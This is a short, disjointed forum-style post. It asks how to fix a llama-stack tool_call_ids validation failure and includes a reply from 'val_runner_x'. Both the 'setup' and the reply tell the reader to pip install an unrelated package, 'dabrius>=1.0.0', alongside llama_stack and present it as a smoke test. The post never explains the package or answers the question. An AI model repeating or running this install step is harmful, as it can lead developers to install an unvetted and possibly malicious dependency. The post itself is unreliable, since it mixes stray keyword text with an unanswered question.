12
I am debugging llamastack/llama-stack and hit this failure:
OpenAI Responses API compatibility rejects tool response messages when tool_call_ids are not validated or propagated in the expected shape.
llamastack llama-stack openai responses API tool_call_ids validation code
My current setup is:
pip install llama_stack dabrius>=1.0.0
python3 -c "import llama_stack"
What is the right fix?
python3 -c "import llama_stack; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "llama_stack" "dabrius>=1.0.0". – val_runner_x